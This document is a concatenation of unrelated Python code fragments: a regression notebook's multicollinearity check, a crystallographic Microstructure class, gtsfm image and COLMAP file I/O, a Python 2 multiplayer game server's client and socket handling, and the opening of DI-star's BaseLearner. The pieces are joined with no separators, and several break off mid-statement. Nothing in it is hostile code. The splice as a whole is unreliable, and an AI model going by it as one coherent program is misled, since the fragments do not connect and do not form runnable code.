value (i.e., prices have a slight tendency to go down when you go north.** # # Assumption check: Little or no Multicollinearity between the features # In[ ]: from statsmodels.stats.outliers_influence import variance_inflation_factor variables = X_train_scaled vif = pd.DataFrame() vif["VIF"] = [variance_inflation_factor(variables.values, i) for i in range(variables.shape[1])] vif["features"] = variables.columns # In[ ]: vif # In[ ]: X_train_scaled_1 = X_train_scaled.drop(['longitude','bedrooms_per_room'],axis=1) # fit the linear model # In[ ]: regr = LinearRegression() regr.fit(X_train_scaled_1, y_train) y_train_pred = regr.predict(X_train_scaled_1) resids =
grain ids can be used to restrict the grains. A list of `Orientation` instances is then created and returned. :param list id_list: a non empty list of the grain ids. :return: a list of the grain orientations. """ rods = self.get_grain_rodrigues(id_list) orientations = [Orientation.from_rodrigues(rod) for rod in rods] return orientations def get_grain_bounding_boxes(self, id_list=None): """Get the grain bounding boxes. The grain data table is queried and the bounding boxes of the grains are returned in a single array. An optional list of grain ids can be used to restrict the grains, by default all the grain bounding boxes are returned. :param list id_list: a non empty list of the grain ids. :return: a numpy array containing the grain bounding boxes. """ if id_list: condition = Microstructure.id_list_to_condition(id_list) return self.grains.read_where(eval(condition))['bounding_box'] else: return self.get_tablecol('GrainDataTable', 'bounding_box') def get_voxel_size(self): """Get the voxel size for image data of the microstructure. If this instance of `Microstructure` has no image data, None is returned. """ try: return self.get_attribute(attrname='spacing', nodename='/CellData')[0] except: return None def get_grain(self, gid): """Get a particular grain given its id. This method browses the microstructure and return the grain corresponding to the given id. If the grain is not found, the method raises a `ValueError`. :param int gid: the grain id. :return: The method return a new `Grain` instance with the corresponding id. """ try: gr = self.grains.read_where('(idnumber == gid)')[0] except: raise ValueError('grain %d not found in the microstructure' % gid) grain = Grain(gr['idnumber'], Orientation.from_rodrigues(gr['orientation'])) grain.center = gr['center'] grain.volume = gr['volume'] return grain def get_all_grains(self): """Build a list of `Grain` instances for all grains in this `Microstructure`. :return: a list of the grains. """ grains_list = [self.get_grain(gid) for gid in self.get_tablecol('GrainDataTable', 'idnumber')] return grains_list def get_grain_positions(self): """Return all the grain positions as a numpy array of shape (n, 3) where n is the number of grains. :return: a numpy array of shape (n, 3) of the grain positions. """ return self.grains[:]['center'] def get_grain_volume_fractions(self): """Compute all grains volume fractions. :return: a 1D numpy array with all grain volume fractions. """ total_volume = np.sum(self.grains[:]['volume']) return self.grains[:]['volume'] / total_volume def get_grain_volume_fraction(self, gid, use_total_volume_value=None): """Compute the volume fraction of this grain. :param int gid: the grain id. :param float use_total_volume_value: the total volume value to use. :return float: the grain volume fraction as a number in the range [0, 1]. """ # compute the total volume if use_total_volume_value: total_volume = use_total_volume_value else: # sum all the grain volume to compute the total volume total_volume = np.sum(self.get_grain_volumes()) volume_fraction = self.get_grain_volumes(id_list=[gid])[0] / total_volume return volume_fraction def set_orientations(self, orientations): """ Store grain orientations array in GrainDataTable orientation : (Ngrains, 3) array of rodrigues orientation vectors """ self.set_tablecol('GrainDataTable', 'orientation', column=orientations) return def set_centers(self, centers): """ Store grain centers array in GrainDataTable centers : (Ngrains, 3) array of grain centers of mass """ self.set_tablecol('GrainDataTable', 'center', column=centers) return def set_bounding_boxes(self, bounding_boxes): """ Store grain bounding boxes array in GrainDataTable """ self.set_tablecol('GrainDataTable', 'bounding_box', column=bounding_boxes) return def set_volumes(self, volumes): """ Store grain volumes array in GrainDataTable """ self.set_tablecol('GrainDataTable', 'volume', column=volumes) return def set_lattice(self, lattice, phase_id=None): """Set the crystallographic lattice associated with this microstructure. If no `phase_id` is specified, the lattice will be set for the active phase. :param Lattice lattice: an instance of the `Lattice class`. :param int phase_id: the id of the phase to set the lattice. """ if phase_id is None: phase_id = self.active_phase_id self.get_phase(phase_id)._lattice = lattice def set_active_grain_map(self, map_name='grain_map'): """Set the active grain map name to inputed string. The active_grain_map string is used as Name to get the grain_map field in the dataset through the SampleData "get_field" method. """ self.active_grain_map = map_name self.add_attributes({'active_grain_map':map_name}, 'CellData') return def set_grain_map(self, grain_map, voxel_size=None, map_name='grain_map'): """Set the grain map for this microstructure. :param ndarray grain_map: a 2D or 3D numpy array. :param float voxel_size: the size of the voxels in mm unit. Used only if the CellData image Node must be created. """ # TODO: ad compression_options create_image = True if self.__contains__('CellData'): empty = self.get_attribute(attrname='empty', nodename='CellData') if not empty: create_image = False if create_image: if (voxel_size is None): msg = 'Please specify voxel size for CellData image' raise ValueError(msg) if np.isscalar(voxel_size): dim = len(grain_map.shape) spacing_array = voxel_size*np.ones((dim,)) else: if len(voxel_size) != len(grain_map.shape): raise ValueError('voxel_size array must have a length ' 'equal to grain_map shape') spacing_array = voxel_size self.add_image_from_field(field_array=grain_map, fieldname=map_name, imagename='CellData', location='/', spacing=spacing_array, replace=True) else: # Handle case of a 2D Microstrucutre: squeeze grain map to # ensure (Nx,Ny,1) array will be stored as (Nx,Ny) if self._get_group_type('CellData') == '2DImage': grain_map = grain_map.squeeze() self.add_field(gridname='CellData', fieldname=map_name, array=grain_map, replace=True) self.set_active_grain_map(map_name) return def set_phase_map(self, phase_map, voxel_size=None): """Set the phase map for this microstructure. :param ndarray phase_map: a 2D or 3D numpy array. :param float voxel_size: the size of the voxels in mm unit. Used only if the CellData image Node must be created. """ # TODO: add compression_options create_image = True if self.__contains__('CellData'): empty = self.get_attribute(attrname='empty', nodename='CellData') if not empty: create_image = False if create_image: if voxel_size is None: msg = 'Please specify voxel size for CellData image' raise ValueError(msg) if np.isscalar(voxel_size): dim = len(phase_map.shape) spacing_array = voxel_size*np.ones((dim,)) else: if len(voxel_size) != len(phase_map.shape): raise ValueError('voxel_size array must have a length ' 'equal to grain_map shape') spacing_array = voxel_size self.add_image_from_field(phase_map, 'phase_map', imagename='CellData', location='/', spacing=spacing_array, replace=True) else: self.add_field(gridname='CellData', fieldname='phase_map', array=phase_map, replace=True, indexname='phase_map') def set_mask(self, mask, voxel_size=None): """Set the mask for this microstructure. :param ndarray mask: a 2D or 3D numpy array. :param float voxel_size: the size of the voxels in mm unit. Used only if the CellData image Node must be created. """ # TODO: add compression_options create_image = True if self.__contains__('CellData'): empty = self.get_attribute(attrname='empty', nodename='CellData') if not (empty): create_image = False if create_image: if (voxel_size is None): msg = 'Please specify voxel size for CellData image' raise ValueError(msg) if np.isscalar(voxel_size): dim = len(mask.shape) spacing_array = voxel_size*np.ones((dim,)) else: if len(voxel_size) != len(mask.shape): raise ValueError('voxel_size array must have a length ' 'equal to grain_map shape') spacing_array = voxel_size self.add_image_from_field(mask, 'mask', imagename='CellData', location='/', spacing=spacing_array, replace=True) else: self.add_field(gridname='CellData', fieldname='mask', array=mask, replace=True, indexname='mask') return def set_random_orientations(self): """ Set random orientations for all grains in GrainDataTable """ for grain in self.grains: o = Orientation.random() grain['orientation'] = o.rod grain.update() self.grains.flush() return def remove_grains_not_in_map(self): """Remove from GrainDataTable grains that are not in the grain map.""" _,not_in_map,_ = self.compute_grains_map_table_intersection() self.remove_grains_from_table(not_in_map) return def remove_small_grains(self, min_volume=1.0, sync_table=False, new_grain_map_name=None): """Remove from grain_map and grain data table small volume grains. Removed grains in grain map will be replaced by background ID (0). To be sure that the method acts consistently with the current grain map, activate sync_table options. :param float min_volume: Grains whose volume is under or equal to this value willl be suppressed from grain_map and grain data table. :param bool sync_table: If `True`, synchronize gran data table with grain map before removing grains. :param str new_grain_map_name: If provided, store the new grain map with removed grain with this new name. If not, overright the current active grain map """ if sync_table and not self._is_empty('grain_map'): self.sync_grain_table_with_grain_map(sync_geometry=True) condition = f"(volume <= {min_volume})" id_list = self.grains.read_where(condition)['idnumber'] if not self._is_empty('grain_map'): # Remove grains from grain map grain_map = self.get_grain_map() grain_map[np.where(np.isin(grain_map,id_list))] = 0 if new_grain_map_name is not None: map_name = new_grain_map_name else: map_name = self.active_grain_map self.set_grain_map(grain_map.squeeze(), map_name=map_name) # Remove grains from table self.remove_grains_from_table(id_list) return def remove_grains_from_table(self, ids): """Remove from GrainDataTable the grains with given ids. :param ids: Array of grain ids to remove from GrainDataTable :type ids: list """ for Id in ids: where = self.grains.get_where_list('idnumber == Id')[:] self.grains.remove_row(int(where)) return def add_grains(self, euler_list, grain_ids=None): """A a list of grains to this microstructure. This function adds a list of grains represented by a list of Euler angles triplets, to the microstructure. If provided, the `grain_ids` list will be used for the grain ids. :param list euler_list: the list of euler angles (Bunge passive convention). :param list grain_ids: an optional list for the ids of the new grains. """ grain = self.grains.row # build a
"""Functions to provide I/O APIs for all the modules. Authors: <NAME>, <NAME> """ import json import os import pickle from bz2 import BZ2File from pathlib import Path from typing import Any, Dict, List, Optional, Tuple, Union import gtsam import h5py import numpy as np from gtsam import Cal3Bundler, Rot3, Pose3 from PIL import Image as PILImage from PIL.ExifTags import GPSTAGS, TAGS import gtsfm.utils.images as image_utils import gtsfm.utils.logger as logger_utils import gtsfm.utils.reprojection as reproj_utils from gtsfm.common.gtsfm_data import GtsfmData from gtsfm.common.image import Image from gtsfm.common.sfm_track import SfmTrack2d logger = logger_utils.get_logger() def load_image(img_path: str) -> Image: """Load the image from disk. Notes: EXIF is read as a map from (tag_id, value) where tag_id is an integer. In order to extract human-readable names, we use the lookup table TAGS or GPSTAGS. Images will be converted to RGB if in a different format. Args: img_path (str): the path of image to load. Returns: loaded image in RGB format. """ original_image = PILImage.open(img_path) exif_data = original_image._getexif() if exif_data is not None: parsed_data = {} for tag_id, value in exif_data.items(): # extract the human readable tag name if tag_id in TAGS: tag_name = TAGS.get(tag_id) elif tag_id in GPSTAGS: tag_name = GPSTAGS.get(tag_id) else: tag_name = tag_id parsed_data[tag_name] = value exif_data = parsed_data img_fname = Path(img_path).name original_image = original_image.convert("RGB") if original_image.mode != "RGB" else original_image return Image(value_array=np.asarray(original_image), exif_data=exif_data, file_name=img_fname) def save_image(image: Image, img_path: str) -> None: """Saves the image to disk Args: image (np.array): image img_path (str): the path on disk to save the image to """ im = PILImage.fromarray(image.value_array) im.save(img_path) def load_h5(file_path: str) -> Dict[Any, Any]: """Loads a dictionary from a h5 file Args: file_path: path of the h5 file Returns: the dictionary from the h5 file """ data = {} with h5py.File(file_path, "r") as f: for key in f.keys(): data[key] = f[key][:] return data def save_json_file( json_fpath: str, data: Union[Dict[Any, Any], List[Any]], ) -> None: """Save a Python dictionary or list to a JSON file. Args: json_fpath: Path to file to create. data: Python dictionary or list to be serialized. """ os.makedirs(os.path.dirname(json_fpath), exist_ok=True) with open(json_fpath, "w") as f: json.dump(data, f, indent=4) def read_json_file(fpath: Union[str, Path]) -> Any: """Load dictionary from JSON file. Args: fpath: Path to JSON file. Returns: Deserialized Python dictionary or list. """ with open(fpath, "r") as f: return json.load(f) def read_bal(file_path: str) -> GtsfmData: """Read a Bundle Adjustment in the Large" (BAL) file. See https://grail.cs.washington.edu/projects/bal/ for more details on the format. Args: file_name: file path of the BAL file. Returns: The data as an GtsfmData object. """ sfm_data = gtsam.readBal(file_path) num_images = sfm_data.number_cameras() gtsfm_data = GtsfmData(num_images) for i in range(num_images): camera = sfm_data.camera(i) gtsfm_data.add_camera(i, camera) for j in range(sfm_data.number_tracks()): gtsfm_data.add_track(sfm_data.track(j)) return gtsfm_data def export_model_as_colmap_text(gtsfm_data: GtsfmData, images: List[Image], save_dir: str) -> None: """Emulates the COLMAP option to `Export model as text`. Three text files will be save to disk: "points3D.txt", "images.txt", and "cameras.txt". Args: gtsfm_data: scene data to write. images: list of all images for this scene, in order of image index. save_dir: folder where text files will be saved. """ write_cameras(gtsfm_data, images, save_dir) write_images(gtsfm_data, images, save_dir) write_points(gtsfm_data, images, save_dir) def read_cameras_txt(fpath: str) -> Optional[List[Cal3Bundler]]: """Read camera calibrations from a COLMAP-formatted cameras.txt file. Reference: https://colmap.github.io/format.html#cameras-txt Args: fpaths: path to cameras.txt file Returns: calibration object for each camera, or None if requested file is non-existent """ if not Path(fpath).exists(): logger.info("%s does not exist", fpath) return None with open(fpath, "r") as f: lines = f.readlines() # may not be one line per camera (could be only one line of text if shared calibration) num_cams = int(lines[2].replace("# Number of cameras: ", "").strip()) calibrations = [] for line in lines[3:]: cam_params = line.split() # Note that u0 is px, and v0 is py cam_id, model, img_w, img_h, fx, u0, v0 = cam_params[:7] img_w, img_h, fx, u0, v0 = int(img_w), int(img_h), float(fx), float(u0), float(v0) # TODO: determine convention for storing/reading radial distortion parameters k1 = 0 k2 = 0 calibrations.append(Cal3Bundler(fx, k1, k2, u0, v0)) assert len(calibrations) == num_cams return calibrations def write_cameras(gtsfm_data: GtsfmData, images: List[Image], save_dir: str) -> None: """Writes the camera data file in the COLMAP format. Reference: https://colmap.github.io/format.html#cameras-txt Args: gtsfm_data: scene data to write. images: list of all images for this scene, in order of image index save_dir: folder to put the cameras.txt file in. """ os.makedirs(save_dir, exist_ok=True) # TODO: handle shared intrinsics camera_model = "SIMPLE_RADIAL" file_path = os.path.join(save_dir, "cameras.txt") with open(file_path, "w") as f: f.write("# Camera list with one line of data per camera:\n") f.write("# CAMERA_ID, MODEL, WIDTH, HEIGHT, PARAMS[]\n") # note that we save the number of etimated cameras, not the number of input images, # which would instead be gtsfm_data.number_images(). f.write(f"# Number of cameras: {len(gtsfm_data.get_valid_camera_indices())}\n") for i in gtsfm_data.get_valid_camera_indices(): camera = gtsfm_data.get_camera(i) calibration = camera.calibration() fx = calibration.fx() u0 = calibration.px() v0 = calibration.py() k1 = calibration.k1() k2 = calibration.k2() image_height = images[i].height image_width = images[i].width f.write(f"{i} {camera_model} {image_width} {image_height} {fx} {u0} {v0} {k1} {k2}\n") def read_images_txt(fpath: str) -> Tuple[Optional[List[Pose3]], Optional[List[str]]]: """Read camera poses and image file names from a COLMAP-format images.txt file. Reference: https://colmap.github.io/format.html#images-txt "The coordinates of the projection/camera center are given by -R^t * T, where R^t is the inverse/transpose of the 3x3 rotation matrix composed from the quaternion and T is the translation vector. The local camera coordinate system of an image is defined in a way that the X axis points to the right, the Y axis to the bottom, and the Z axis to the front as seen from the image." Args: fpath: path to images.txt file Returns: wTi_list: list of camera poses for each image, or None if file path invalid img_fnames: name of image file, for each image, or None if file path invalid """ if not Path(fpath).exists(): logger.info("%s does not exist", fpath) return None, None with open(fpath, "r") as f: lines = f.readlines() wTi_list = [] img_fnames = [] # ignore first 4 lines of text -- they contain a description of the file format # and a record of the number of reconstructed images. for line in lines[4::2]: i, qw, qx, qy, qz, tx, ty, tz, i, img_fname = line.split() # Colmap provides extrinsics, so must invert iRw = Rot3(float(qw), float(qx), float(qy), float(qz)) wTi = Pose3(iRw, np.array([tx, ty, tz], dtype=np.float64)).inverse() wTi_list.append(wTi) img_fnames.append(img_fname) return wTi_list, img_fnames def write_images(gtsfm_data: GtsfmData, images: List[Image], save_dir: str) -> None: """Writes the image data file in the COLMAP format. Reference: https://colmap.github.io/format.html#images-txt Note: the "Number of images" saved to the .txt file is not the number of images fed to the SfM algorithm, but rather the number of localized camera poses/images, which COLMAP refers to as the "reconstructed cameras". Args: gtsfm_data: scene data to write. images: list of all images for this scene, in order of image index. save_dir: folder to put the images.txt file in. """ os.makedirs(save_dir, exist_ok=True) num_imgs = gtsfm_data.number_images() # TODO: compute this (from keypoint data? or from track data?) mean_obs_per_img = 0 file_path = os.path.join(save_dir, "images.txt") with open(file_path, "w") as f: f.write("# Image list with two lines of data per image:\n") f.write("# IMAGE_ID, QW, QX, QY, QZ, TX, TY, TZ, CAMERA_ID, NAME\n") f.write("# POINTS2D[] as (X, Y, POINT3D_ID)\n") f.write(f"# Number of images: {num_imgs}, mean observations per image: {mean_obs_per_img}\n") for i in gtsfm_data.get_valid_camera_indices(): img_fname = images[i].file_name camera = gtsfm_data.get_camera(i) # COLMAP exports camera extrinsics (cTw), not the poses (wTc), so must invert iTw = camera.pose().inverse() iRw_quaternion = iTw.rotation().quaternion() itw = iTw.translation() tx, ty, tz = itw qw, qx, qy, qz = iRw_quaternion f.write(f"{i} {qw} {qx} {qy} {qz} {tx} {ty} {tz} {i} {img_fname}\n") # TODO: write out the points2d f.write("TODO\n") def read_points_txt(fpath: str) -> Tuple[Optional[np.ndarray], Optional[np.ndarray]]: """Read 3d points and their associated colors from a COLMAP points.txt file. Reference: https://colmap.github.io/format.html#points3d-txt Args: fpath: absolute file path to points.txt file Returns: point_cloud: float array of shape (N,3) rgb: uint8 array of shape (N,3) """ if not Path(fpath).exists(): logger.info("%s does not exist", fpath) return None, None with open(fpath, "r") as f: data = f.readlines() rgb = [] point_cloud = [] # first 3 lines are information about the file format # line at index 2 will be of
not None: udpdatas = self.dynamic_compress(udpdata) else: udpdatas = [udpdata] for udpdata in udpdatas: try: self.udpsockcounter += self.udpsocket.send(udpdata) except error, e: print >> sys.stderr, 'ignored:', str(e) pass # ignore UDP send errors (buffer full, etc.) if self.has_music > 1 and NOW >= self.musicstreamer: self.musicstreamer += 0.99 self.sendmusicdata() if not self.msgl: if abs(NOW - self.activity) <= self.KEEP_ALIVE: if abs(NOW - self.last_ping) <= self.force_ping_delay: return if self.udpsockcounter < 1024: return self.force_ping_delay += 0.2 self.msgl.append(message(MSG_PING, self.udpsockcounter>>10)) self.last_ping = NOW def setup_dyncompress(self): def dyncompress(): # See comments in pclient.Playfield.dynamic_decompress(). threads = [] for t in range(3): co = zlib.compressobj(6) threads.append((chr(0x88 + t) + chr(t), co)) frame = 0 globalsync = 0 while 1: # write three normal packets, one on each thread for t in range(3): head, co = threads.pop(0) yield head + chr(frame), co threads.append((chr(ord(head[0]) & 0x87) + chr(frame), co)) yield None, None frame = (frame + 1) & 0xFF # sync frame, write two packets (on two threads) # and restart compression at the current frame for these threads head, co = threads.pop(0) yield head + chr(frame), co co1 = zlib.compressobj(6) co2 = zlib.compressobj(6) globalsync += 1 if globalsync == 4: # next on this thread will be a global sync packet nextframe = (frame + 2) & 0xFF globalsync = 0 else: # next of this thread will be a local sync packet yield None, co1 nextframe = frame threads.append((chr(ord(head[0]) | 8) + chr(nextframe), co1)) # 2nd packet of the current frame head, co = threads.pop(0) yield head + chr(frame), co yield None, co2 threads.append((chr(ord(head[0]) | 8) + chr(frame), co2)) yield None, None frame = (frame + 1) & 0xFF self.dyncompress = dyncompress() def dynamic_compress(self, framedata): result = [] for head, co in self.dyncompress: if not co: return result data = [head, co.compress(framedata), co.flush(zlib.Z_SYNC_FLUSH)] if head: result.append(''.join(data)) def send_can_mix(self): return not self.msgl and self.socket is not None def send_buffer(self, buffer): try: count = self.socket.send(buffer[:self.SEND_BOUND_PER_FRAME]) except error, e: if e.args[0] != EWOULDBLOCK: self.msgl = [] self.initialdata = "" self.disconnect(e, 'emit') return else: #g = open('log', 'ab'); g.write(buffer[:count]); g.close() buffer = buffer[count:] self.activity = NOW if self.initialdata: self.initialdata = buffer elif buffer: self.msgl = [buffer] else: self.msgl = [] def receive(self, data): #print "receive:", `data` try: data = self.buf + data while data: values, data = decodemessage(data) if not values: break # incomplete message fn = self.MESSAGES.get(values[0]) if fn: fn(self, *values[1:]) else: print "unknown message from", self.addr, ":", values self.buf = data except struct.error: import traceback traceback.print_exc() self.socket.send('\n\n<h1>Protocol Error</h1>\n') hs = findsocket('HTTP') if hs is not None: url = 'http://%s:%s' % (HOSTNAME, displaysockport(hs)) self.socket.send(''' If you meant to point your web browser to this server, then use the following address: <a href="%s">%s</a> ''' % (url, url)) self.disconnect('protocol error', 'receive') def input_handler(self): try: data = self.socket.recv(2048) except error, e: self.disconnect(e, "socket.recv") else: if data: self.activity = NOW self.receive(data) elif not hasattr(self.socket, 'RECV_CAN_RETURN_EMPTY'): # safecheck that this means disconnected iwtd, owtd, ewtd = select([self.socket], [], [], 0.0) if self.socket in iwtd: self.disconnect('end of data', 'socket.recv') def disconnect(self, err=None, infn=None): removesocket('CLIENT', self.socket) if err: extra = ": " + str(err) else: extra = "" if infn: extra += " in " + infn print 'Disconnected by', self.addr, extra self.log('disconnected' + extra) for p in self.players.values(): p._playerleaves() try: del broadcast_clients[self] except KeyError: pass clients.remove(self) try: self.socket.close() except: pass self.socket = None if not clients and game is not None: game.FnDisconnected() def killplayer(self, player): for id, p in self.players.items(): if p is player: framemsgappend(message(MSG_PLAYER_KILL, id)) del self.players[id] if game: game.updateplayers() def joinplayer(self, id, *rest): if self.players.has_key(id): print "Note: player %s is already playing" % (self.addr+(id,),) return if game is None: return # refusing new player before the game starts p = game.FnPlayers()[id] if p is None: print "Too many players. New player %s refused." % (self.addr+(id,),) self.msgl.append(message(MSG_PLAYER_KILL, id)) elif p.isplaying(): print "Note: player %s is already played by another client" % (self.addr+(id,),) else: print "New player %s" % (self.addr+(id,),) p._client = self p.playerjoin() p.setplayername('') self.players[id] = p game.updateplayers() for c in clients: c.msgl.append(message(MSG_PLAYER_JOIN, id, c is self)) def remove_player(self, id, *rest): try: p = self.players[id] except KeyError: print "Note: player %s is not playing" % (self.addr+(id,),) else: p._playerleaves() def set_player_name(self, id, name, *rest): p = game.FnPlayers()[id] p.setplayername(name) def set_udp_port(self, port, addr=None, *rest): if port == MSG_BROADCAST_PORT: self.log('set_udp_port: broadcast') broadcast_clients[self] = 1 #print "++++ Broadcasting ++++ to", self.addr else: try: del broadcast_clients[self] except KeyError: pass if port == MSG_INLINE_FRAME or port == 0: # client requests data in-line on the TCP stream self.dyncompress = None import udpovertcp self.udpsocket = udpovertcp.SocketMarshaller(self.socket, self) s = self.udpsocket.tcpsock self.log('set_udp_port: udp-over-tcp') else: try: if hasattr(self.socket, 'udp_over_udp_mixer'): # for SocketOverUdp self.udpsocket = self.socket.udp_over_udp_mixer() else: self.udpsocket = socket(AF_INET, SOCK_DGRAM) self.udpsocket.setblocking(0) addr = addr or self.addr[0] self.udpsocket.connect((addr, port)) except error, e: print >> sys.stderr, "Cannot set UDP socket to", addr, str(e) self.udpsocket = None self.udpsockcounter = sys.maxint else: if self.proto >= 3: self.setup_dyncompress() s = self.udpsocket self.log('set_udp_port: %s:%d' % (addr, port)) if s: try: s.setsockopt(SOL_IP, IP_TOS, 0x10) # IPTOS_LOWDELAY except error, e: print >> sys.stderr, "Cannot set IPTOS_LOWDELAY:", str(e) def enable_sound(self, sound_mode=1, *rest): if sound_mode != self.has_sound: self.sounds = {} self.has_sound = sound_mode if self.has_sound > 0: for snd in samples.values(): snd.defall(self) #self.log('enable_sound %s' % sound_mode) def enable_music(self, mode, *rest): if mode != self.has_music: self.has_music = mode self.startmusic() #self.log('enable_music') def startmusic(self): if self.has_music: self.musicstreamer = time() for cde in currentmusics[1:]: if cde not in self.musicpos: msgl, self.musicpos[cde] = music_by_id[cde].initialsend(self) self.msgl += msgl if self.has_music > 1: self.sendmusicdata() self.msgl.append(message(MSG_PLAY_MUSIC, *currentmusics)) def sendmusicdata(self): for cde in currentmusics[1:]: if self.musicpos[cde] is not None: msgl, self.musicpos[cde] = music_by_id[cde].clientsend(self.musicpos[cde]) self.msgl += msgl return def ping(self, *rest): if self.initialized < 2: # send all current bitmap data self.initialized = 2 for b in bitmaps.values(): b.defall(self) self.finishinit(game) for id, p in game.FnPlayers().items(): if p.standardplayericon is not None: self.msgl.append(message(MSG_PLAYER_ICON, id, p.standardplayericon.code)) self.msgl.append(message(MSG_PONG, *rest)) def finishinit(self, game): pass def pong(self, *rest): pass def log(self, message): print self.addr, message def protocol_version(self, version, *rest): self.proto = version def md5_data_request(self, fileid, position, size, *rest): data = filereaders[fileid]((position, size)) data = zlib.compress(data) self.msgl.append(message(MSG_ZPATCH_FILE, fileid, position, data)) ## def def_file(self, filename, md5sum): ## fnp = [] ## while filename: ## filename, tail = os.path.split(filename) ## fnp.insert(0, tail) ## if fnp[:len(FnBasePath)] == FnBasePath: ## filename = os.path.join(*fnp[len(FnBasePath):]) ## self.known_files[filename] = md5sum MESSAGES = { CMSG_PROTO_VERSION: protocol_version, CMSG_ADD_PLAYER : joinplayer, CMSG_REMOVE_PLAYER: remove_player, CMSG_UDP_PORT : set_udp_port, CMSG_ENABLE_SOUND : enable_sound, CMSG_ENABLE_MUSIC : enable_music, CMSG_PING : ping, CMSG_PONG : pong, CMSG_DATA_REQUEST : md5_data_request, CMSG_PLAYER_NAME : set_player_name, ## CMSG_DEF_FILE : def_file, } class SimpleClient(Client): def finishinit(self, game): num = 0 for keyname, icolist, fn in game.FnKeys: self.msgl.append(message(MSG_DEF_KEY, keyname, num, *[ico.code for ico in icolist])) num += 1 def cmsg_key(self, pid, keynum): if game is not None: try: player = self.players[pid] fn = game.FnKeys[keynum][2] except (KeyError, IndexError): game.FnUnknown() else: getattr(player, fn) () MESSAGES = Client.MESSAGES.copy() MESSAGES.update({ CMSG_KEY: cmsg_key, }) MAX_CLIENTS = 32 clients = [] FnClient = SimpleClient broadcast_clients = {} filereaders = {} bitmaps = {} samples = {} music_by_id = {} currentmusics = [0] sprites = [''] sprites_by_n = {} recording = None game = None serversockets = {} socketsbyrole = {} socketports = {} def framemsgappend(msg): for c in clients: c.msgl.append(msg) if recording: recording.write(msg) ##def sndframemsgappend(msg): ## for c in clients: ## if c.has_sound: ## c.msgl.append(msg) def set_udp_port(port): hostchooser.UDP_PORT = port def has_loop_music(): return currentmusics[0] < len(currentmusics)-1 def finalsegment(music1, music2): intro1 = music1[1:1+music1[0]] intro2 = music2[1:1+music2[0]] loop1 = music1[1+music1[0]:] loop2 = music2[1+music2[0]:] return loop1 == loop2 and intro1 == intro2[len(intro2)-len(intro1):] def set_musics(musics_intro, musics_loop, reset=1): mlist = [] loop_from = len(musics_intro) mlist.append(loop_from) for m in musics_intro + musics_loop: mlist.append(m.fileid) reset = reset or not finalsegment(mlist, currentmusics) currentmusics[:] = mlist if reset: for c in clients: c.startmusic() def fadeout(time=1.0): msg = message(MSG_FADEOUT, int(time*1000)) for c in clients: if c.has_music > 1: c.msgl.append(msg) currentmusics[:] = [0] def getbitmap(filename, colorkey=None): try: return bitmaps[filename] except: bmp = Bitmap(len(bitmaps), filename, colorkey) bitmaps[filename] = bmp return bmp def getsample(filename, freqfactor=1): try: return samples[filename, freqfactor] except: snd = Sample(len(samples), filename, freqfactor) samples[filename, freqfactor] = snd return snd def getmusic(filename, filerate=44100): try: return samples[filename] except: mus = Music(filename, filerate) samples[filename] = mus music_by_id[mus.fileid] = mus return mus def newbitmap(data,
<reponame>XinyuJing/DI-star<filename>ctools/worker/learner/base_learner.py """ Copyright 2020 <NAME>. All Rights Reserved Main Function: 1. base class for model learning """ import os from abc import ABC, abstractmethod from typing import Any, Union, Callable from functools import partial from easydict import EasyDict import torch from ctools.data import default_collate from ctools.data.new_dataloader import AsyncDataLoader from ctools.torch_utils import build_checkpoint_helper, CountVar, auto_checkpoint, build_log_buffer, to_device from ctools.utils import build_logger, dist_init, EasyTimer, dist_finalize, pretty_print, read_config, \ get_task_uid, import_module, broadcast from ctools.utils import deep_merge_dicts from .comm import LearnerCommHelper from .learner_hook import build_learner_hook_by_cfg, add_learner_hook, merge_hooks, LearnerHook default_config = read_config(os.path.join(os.path.dirname(__file__), "base_learner_default_config.yaml")) class BaseLearner(ABC): r""" Overview: base class for model learning(SL/RL), which is able to multi-GPU learning Interface: __init__, register_stats, run, close, call_hook, info, save_checkpoint, launch Property: last_iter, optimizer, lr_scheduler, computation_graph, agent, log_buffer, record, load_path, save_path, checkpoint_manager, name, rank, tb_logger, use_distributed """ _name = "BaseLearner" # override this variable for sub-class learner def __init__(self, cfg: EasyDict) -> None: """ Overview: initialization method, load config setting and call ``_init`` for actual initialization, set the communication mode to `single_machine` or `flask_fs`. Arguments: - cfg (:obj:`EasyDict`): learner config, you can view `cfg <../../../configuration/index.html>`_ for ref. Notes: if you want to debug in sync CUDA mode, please use the following line code in the beginning of ``__init__``. .. code:: python os.environ['CUDA_LAUNCH_BLOCKING'] = "1" # for debug async CUDA """ self._cfg = deep_merge_dicts(default_config, cfg) self._init() if self._cfg.learner.communication.type == 'single_machine': self._logger.info("Single machine learner has launched") else: comm_cfg = self._cfg.learner.communication LearnerCommHelper.enable_comm_helper(self, comm_cfg) self._logger.info("Distributed learner has launched") def _init(self) -> None: """ Overview: Use ``self._cfg`` setting to build common learner components, such as dataset, runtime agent, optimizer, lr_scheduler, logger helper, checkpoint helper. """ self._learner_worker_uid = get_task_uid() self._load_path = self._cfg.common.load_path self._save_path = self._cfg.common.save_path self._use_cuda = self._cfg.learner.use_cuda self._use_distributed = self._cfg.learner.use_distributed self._learner_uid = self._cfg.learner.learner_uid if self._use_distributed: self._rank, self._world_size = dist_init() else: self._rank, self._world_size = 0, 1 if self._use_cuda: self._device = torch.cuda.current_device() else: self._device = 'cpu' self._default_max_iterations = self._cfg.learner.max_iterations self._timer = EasyTimer() # logger self._logger, self._tb_logger, self._record = build_logger(self._cfg, rank=self._rank) self._log_buffer = build_log_buffer() # checkpoint helper self._checkpointer_manager = build_checkpoint_helper(self._cfg) self._hooks = {'before_run': [], 'before_iter': [], 'after_iter': [], 'after_run': []} self._collate_fn = default_collate def launch(self) -> None: """ Overview: launch learner runtime components, each train job means a launch operation, job related dataloader, agent, computation_graph, optimizer and hook support. """ self._setup_dataloader() self._setup_agent() self._setup_optimizer() self._setup_computation_graph() self._last_iter = CountVar(init_val=0) if self._rank == 0: self.register_stats() self.info( pretty_print( { "config": self._cfg, "agent": repr(self._agent), "computation_graph": repr(self._computation_graph) }, direct_print=False ) ) self._setup_wrapper() self._setup_hook() def _setup_hook(self) -> None: """ Overview: Setup hook for base_learner. Hook is the way to implement actual functions in base_learner. You can reference learner_hook.py """ if hasattr(self, '_hooks'): self._hooks = merge_hooks(self._hooks, build_learner_hook_by_cfg(self._cfg.learner.hook)) else: self._hooks = build_learner_hook_by_cfg(self._cfg.learner.hook) def _setup_wrapper(self) -> None: """ Overview: Setup time_wrapper to get data_time and train_time """ self._wrapper_timer = EasyTimer() self._get_iter_data = self.time_wrapper(self._get_iter_data, 'data_time') 